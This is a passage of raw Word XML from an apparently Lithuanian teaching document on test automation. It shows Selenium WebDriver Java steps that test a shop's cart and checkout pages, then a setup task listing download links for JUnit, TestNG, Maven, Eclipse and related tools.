                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="46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4" w:name="_Toc14392656"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>assertThat(driver.findElement(By.cssSelector("h1:nth-child(2)")).getText(), is("iPhone"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="46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5" w:name="_Toc14392657"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.cssSelector("#content &gt; .row:nth-child(1)")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="46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6" w:name="_Toc14392658"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.id("input-quantity")).sendKeys("2");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="46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7" w:name="_Toc14392659"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.id("button-cart")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="46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8" w:name="_Toc14392660"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>assertThat(driver.findElement(By.linkText("iPhone")).getText(), is("iPhone"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="46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69" w:name="_Toc14392661"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:bookmarkEnd w:id="46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0" w:name="_Toc14392662"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>WebElement element = driver.findElement(By.cssSelector(".text-left .btn-primary"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="47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1" w:name="_Toc14392663"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Action builder = new Actions(driver);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="47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2" w:name="_Toc14392664"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>builder.moveToElement(element).perform();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="47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3" w:name="_Toc14392665"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="47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4" w:name="_Toc14392666"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:bookmarkEnd w:id="47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lastRenderedPageBreak/>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:bookmarkStart w:id="475" w:name="_Toc14392667"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>WebElement element = driver.findElement(By.tagName("body"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="47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6" w:name="_Toc14392668"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Action builder = new Actions(driver);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="47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7" w:name="_Toc14392669"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>builder.moveToElement(element, 0, 0).perform();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="47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8" w:name="_Toc14392670"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="47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79" w:name="_Toc14392671"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.id("content")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="47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0" w:name="_Toc14392672"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>assertThat(driver.findElement(By.cssSelector("tbody .text-right:nth-child(6)")).getText(), is("193.33€"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="48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1" w:name="_Toc14392673"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>assertThat(driver.findElement(By.cssSelector(".col-md-4 &gt; .table tr:nth-child(4) &gt; .text-right:nth-child(2)")).getText(), is("193.33€"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="48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2" w:name="_Toc14392674"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:bookmarkEnd w:id="48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3" w:name="_Toc14392675"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>WebElement element = driver.findElement(By.cssSelector(".btn:nth-child(2)"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="48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4" w:name="_Toc14392676"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Action builder = new Actions(driver);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="48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5" w:name="_Toc14392677"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>builder.moveToElement(element).perform();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="48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6" w:name="_Toc14392678"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="48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7" w:name="_Toc14392679"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:bookmarkEnd w:id="48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8" w:name="_Toc14392680"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>WebElement element = driver.findElement(By.tagName("body"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="48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89" w:name="_Toc14392681"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Action builder = new Actions(driver);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="48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0" w:name="_Toc14392682"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>builder.moveToElement(element, 0, 0).perform();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="49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1" w:name="_Toc14392683"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="49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2" w:name="_Toc14392684"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:bookmarkEnd w:id="49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3" w:name="_Toc14392685"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>WebElement element = driver.findElement(By.cssSelector("h2"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="49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4" w:name="_Toc14392686"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Action builder = new Actions(driver);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="49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5" w:name="_Toc14392687"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>builder.moveToElement(element).clickAndHold().perform();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="49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6" w:name="_Toc14392688"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="49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7" w:name="_Toc14392689"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:bookmarkEnd w:id="49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8" w:name="_Toc14392690"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>WebElement element = driver.findElement(By.cssSelector("h2"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="49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499" w:name="_Toc14392691"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Action builder = new Actions(driver);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="49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0" w:name="_Toc14392692"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>builder.moveToElement(element).perform();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="50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1" w:name="_Toc14392693"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="50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2" w:name="_Toc14392694"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:bookmarkEnd w:id="50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3" w:name="_Toc14392695"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>WebElement element = driver.findElement(By.cssSelector("h2"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="50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4" w:name="_Toc14392696"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Action builder = new Actions(driver);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="50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5" w:name="_Toc14392697"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>builder.moveToElement(element).release().perform();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="50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6" w:name="_Toc14392698"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="50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7" w:name="_Toc14392699"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.cssSelector("h2")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="50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8" w:name="_Toc14392700"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:bookmarkEnd w:id="50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09" w:name="_Toc14392701"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>WebElement element = driver.findElement(By.cssSelector(".btn:nth-child(2)"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="50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0" w:name="_Toc14392702"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Action builder = new Actions(driver);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="51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1" w:name="_Toc14392703"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>builder.moveToElement(element).perform();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="51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2" w:name="_Toc14392704"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="51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3" w:name="_Toc14392705"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:bookmarkEnd w:id="51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4" w:name="_Toc14392706"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>WebElement element = driver.findElement(By.tagName("body"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="51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5" w:name="_Toc14392707"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Action builder = new Actions(driver);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="51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6" w:name="_Toc14392708"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>builder.moveToElement(element, 0, 0).perform();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="51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7" w:name="_Toc14392709"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="51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8" w:name="_Toc14392710"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.cssSelector(".fa-times-circle")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="51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19" w:name="_Toc14392711"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.linkText("Continue")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="51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20" w:name="_Toc14392712"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="520"/>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521" w:name="_Toc14392713"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="521"/>
          </w:p>
          <w:p w:rsidR="000E5A3D" w:rsidRPr="00AD4464" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="007209B3" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>AUTOMATIZAVIMO APLINKOS PARUOŠIMAS</w:t>
      </w:r>
      <w:r w:rsidR="00300094">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Reikalinga programinė įranga: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Junit - </w:t>
      </w:r>
      <w:hyperlink r:id="rId150" w:history="1">
        <w:r w:rsidRPr="00AD4464">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://junit.org/index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">TestNG - </w:t>
      </w:r>
      <w:hyperlink r:id="rId151" w:history="1">
        <w:r w:rsidRPr="00AD4464">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://testng.org/doc/download.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Java - </w:t>
      </w:r>
      <w:hyperlink r:id="rId152" w:history="1">
        <w:r w:rsidRPr="00AD4464">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://www.oracle.com/technetwork/java/javase/downloads/index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Selenium WebDriver - </w:t>
      </w:r>
      <w:hyperlink r:id="rId153" w:history="1">
        <w:r w:rsidRPr="00AD4464">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://www.seleniumhq.org/projects/webdriver/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Maven - </w:t>
      </w:r>
      <w:hyperlink r:id="rId154" w:history="1">
        <w:r w:rsidRPr="00AD4464">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://maven.apache.org/download.cgi</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Eclipse - </w:t>
      </w:r>
      <w:hyperlink r:id="rId155" w:history="1">
        <w:r w:rsidRPr="00AD4464">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://www.eclipse.org/downloads/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Matcher - </w:t>
      </w:r>
      <w:hyperlink r:id="rId156" w:history="1">
        <w:r w:rsidRPr="00AD4464">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://code.google.com/p/hamcrest/downloads/list</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">JDK - </w:t>
      </w:r>
      <w:hyperlink r:id="rId157" w:history="1">
        <w:r w:rsidRPr="00AD4464">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://www.oracle.com/technetwork/java/javase/downloads/index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Maven plugin for Eclipse - </w:t>
      </w:r>
      <w:hyperlink r:id="rId158" w:history="1">
        <w:r w:rsidRPr="00AD4464">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://maven.apache.org/download.cgi</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Hamcrest - </w:t>
      </w:r>
      <w:hyperlink r:id="rId159" w:history="1">
        <w:r w:rsidRPr="00AD4464">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://code.google.com/p/hamcrest/downloads/list</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
